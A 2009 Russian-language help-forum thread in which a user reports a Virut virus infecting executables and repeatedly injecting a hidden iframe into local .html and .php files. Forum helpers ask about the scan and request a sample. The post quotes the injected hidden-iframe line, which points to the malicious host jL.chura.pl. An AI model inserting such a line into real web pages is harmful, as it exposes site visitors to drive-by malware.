Показано с 1 по 4 из 4.

/jL.chura.pl

  1. #1
    Junior Member Репутация
    Регистрация
    23.04.2009
    Сообщений
    2
    Вес репутации
    55

    /jL.chura.pl

    Вирус заражает находящиеся на диске C: исполняемые файлы (в основном .exe, но возможно не только), не исключино что и на других дисках поскольку после установки винды вирус появился вновь.. дописывая до каждого из них 18944 байта своего кода, особенно усердствуя в папке C:\Windows\system32\. неизвестные процессы не обнаружены

    В результате действия вируса во всех .html и .php файлах на диске C:, а также на других дисках в тех папках, которые открывались в Проводнике или TotalCommander, начинает перед тегом "</body>" в бесконечном цикле добавлятся следующая строчка:

    CODE
    <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

    после удаления через секунду код появляется вновь




    после повторной периустановки голой винды в хтмл файлы ничего не дописывается, поетапно будем подключать винду к нету, ставить софт, посмотрим когда активизируется вирус, хочу сравнить исходники инсталях на других дисках, почему то кажется что ехе шники по всех разделах побиты

    доктор веб (CureIt) идинтифицирует его как Virus.Win32.Virut.56

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    VIP Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    07.07.2005
    Адрес
    Moscow region
    Сообщений
    30,462
    Вес репутации
    2522
    Куреитом до полного излечения лечились?
    Павел
    AVZ HijackThis помощь с 10-00 до 18-00МСК

    Windows7, SEP(work)
    WindowsXP KIS(home)

    На up не реагирую

  4. #3
    Junior Member Репутация
    Регистрация
    23.04.2009
    Сообщений
    2
    Вес репутации
    55
    до конца не лечился, влом 10 часов ждать, поставил винду как ни странно со всех php файлов на всех дисках удалилились вирусные строки перед боди, подключился в инет все тихо, запустил любой екзешник с любого диска не С, винт сново всбесился во всех 20000 веб файлах опять таже строка
    способ ли чения, удалить все ехе файлы со всех дисков, форматить диск С, чем щас и займусь, вирус неплохой новый, пока в СНГ не много его схватили антивирусы на него не реагируют...

  5. #4
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для pig
    Регистрация
    17.09.2004
    Адрес
    Апатиты, Мурманская область, Россия
    Сообщений
    10,629
    Вес репутации
    1315
    То, что запускали (любой екзешник с любого диска не С), - пришлите по правилам.

Похожие темы

  1. Что такое jL.chura.pl:.... ?
    От Tuapse1965 в разделе Антивирусы
    Ответов: 4
    Последнее сообщение: 16.04.2009, 08:34
  2. Что такое jl.chura.pl/rc/
    От coffe в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 22.03.2009, 12:19

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00469 seconds with 16 queries